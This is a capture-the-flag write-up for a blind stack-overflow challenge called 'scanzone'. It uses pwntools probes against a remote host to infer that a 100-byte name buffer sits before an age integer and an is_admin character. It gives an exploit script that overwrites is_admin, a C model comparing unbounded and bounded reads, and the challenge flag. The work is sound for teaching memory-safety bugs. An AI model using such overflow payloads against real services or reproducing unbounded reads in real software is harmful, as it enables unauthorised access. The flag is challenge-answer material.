scanzone
Description:
host: ctf.airgapp.in port: 3456
Solution:
A blind pwn (no binary provided). After the contest I read other people's writeups; this is a summary of the approach.

First, look at how the program runs: there are only two chances to give input, and there is no format string vulnerability (the name is echoed back verbatim rather than passed to printf as a format string).

```text
enter your name:
admin
enter your age:
23
hello user admin, you are 23 years old
You are not an admin
```
Testing showed that if the string sent as the name is constructed as follows (100 filler bytes followed by four `0xff` bytes):

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
p = remote('ctf.airgapp.in', 3456)

pd = b'a' * 0x64            # 0x64 = 100 bytes: fills the name buffer exactly
pd += p32(0xffffffff)       # next 4 bytes land on the variable after name
p.sendlineafter(b'name:\n', pd)
p.sendlineafter(b' age:\n', b'23')
p.interactive()
```

then the returned string becomes:

```text
hello user aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xff\xff\xff\xff, you are -1 years old
You are not an admin
```
The name buffer is therefore exactly 100 bytes and is read without a length check, and the four bytes written immediately after it are printed back as the age: `0xffffffff` interpreted as a signed 32-bit `int` is -1. So `age` sits directly after `name` with no padding in between, and the program's variables look roughly like this:

```c
char name[100];
int age;
// .. other variables ..
```
The variable after `age` is most likely the admin flag, either a `bool is_admin` or a `char is_admin`, and it should be reachable by appending one more byte to the payload.

Testing (appending a single `'Y'` after the four `0xff` bytes) showed that the next variable is a `char is_admin` compared against `'Y'`, so the program is roughly:

```c
char name[100];
int age;
char is_admin = 'N';
// ...
if (is_admin == 'Y')
    // ...
```
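To make the inferred layout concrete, here is a small model of the vulnerable read and its hardened counterpart. This is an added example, not the challenge binary or anyone's recovered source: the struct `user_vars`, the functions `unbounded_read_name`, `bounded_read_name`, `run_unbounded` and `run_bounded`, and the initial values (age 23, flag `'N'`) are assumptions chosen to match the behaviour described above. The real program keeps these as stack locals; a struct is used here because the compiler may reorder locals, while struct member order is fixed. The payload is exactly the one the writeup sends: 100 filler bytes, `p32(0xffffffff)`, then `'Y'`.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout inferred from the challenge's behaviour (assumed, see lead-in):
 * name is 100 bytes, age follows at offset 100, is_admin at offset 104. */
struct user_vars {
    char name[100];
    int  age;
    char is_admin;
};

/* Result of one simulated session. */
struct outcome {
    int  admin;   /* 1 if the admin check would pass */
    int  age;     /* value of age after the name was read */
    char flag;    /* value of is_admin after the name was read */
};

/* Build the writeup's payload: 'a' * 0x64 + p32(0xffffffff) + 'Y'.
 * `out` must hold at least 106 bytes; returns the payload length (105). */
static size_t build_payload(unsigned char *out)
{
    size_t n = 100;
    memset(out, 'a', 100);                /* fills name exactly */
    out[n++] = 0xff; out[n++] = 0xff;     /* p32(0xffffffff): lands on age, */
    out[n++] = 0xff; out[n++] = 0xff;     /* read back as the signed int -1 */
    out[n++] = 'Y';                       /* lands on is_admin */
    out[n] = '\0';
    return n;
}

/* Models an unbounded read such as gets(name) or scanf("%s", name): copies
 * bytes until a NUL with no regard for sizeof(name), so everything past
 * byte 100 lands on the variables that follow. The copy is capped at the
 * struct size only to keep this demo well-defined; a real gets() would keep
 * going into the saved frame pointer and return address. */
static void unbounded_read_name(struct user_vars *v, const unsigned char *in)
{
    unsigned char *dst = (unsigned char *)v;
    size_t i;
    for (i = 0; in[i] != '\0' && i < sizeof(*v) - 1; i++)
        dst[i] = in[i];
    dst[i] = '\0';
}

/* Hardened counterpart, equivalent to fgets(name, sizeof name, stdin):
 * at most 99 bytes plus the terminator, never touching age or is_admin. */
static void bounded_read_name(struct user_vars *v, const unsigned char *in)
{
    size_t i;
    for (i = 0; in[i] != '\0' && i < sizeof(v->name) - 1; i++)
        v->name[i] = (char)in[i];
    v->name[i] = '\0';
}

/* One simulated session: state as the program would hold it (assumed
 * initial values), then the name prompt answered with the payload. */
static struct outcome session(void (*reader)(struct user_vars *, const unsigned char *))
{
    struct user_vars v;
    struct outcome o;
    unsigned char payload[128];

    memset(&v, 0, sizeof v);
    v.age = 23;          /* the age the user typed */
    v.is_admin = 'N';    /* default: not an admin */

    build_payload(payload);
    reader(&v, payload);

    o.admin = (v.is_admin == 'Y');
    o.age = v.age;
    o.flag = v.is_admin;
    return o;
}

struct outcome run_unbounded(void) { return session(unbounded_read_name); }
struct outcome run_bounded(void)   { return session(bounded_read_name); }

int main(void)
{
    struct outcome u = run_unbounded();
    struct outcome b = run_bounded();
    printf("unbounded read: admin=%d age=%d is_admin=%c\n", u.admin, u.age, u.flag);
    printf("bounded read:   admin=%d age=%d is_admin=%c\n", b.admin, b.age, b.flag);
    return 0;
}
```

With the unbounded read the session reports age -1 and `is_admin == 'Y'`, reproducing the two observations the writeup used to map the layout; with the bounded read the payload is truncated at 99 bytes and both variables keep their original values. The same byte-by-byte probing generalises to any blind stack overflow where some variable after the buffer is echoed back: each echoed value tells you the offset and width of one slot.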
The exploit:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
p = remote('ctf.airgapp.in', 3456)

pd = b'a' * 0x64            # 100 bytes: fill name[100]
pd += p32(0xffffffff)       # overwrite age (printed as -1, harmless)
pd += b'Y'                  # overwrite is_admin so that is_admin == 'Y'
p.sendlineafter(b'name:\n', pd)
p.sendlineafter(b' age:\n', b'23')
p.interactive()
```
Flag:
thug{w3lcome_2_the_sc4n_z0ne}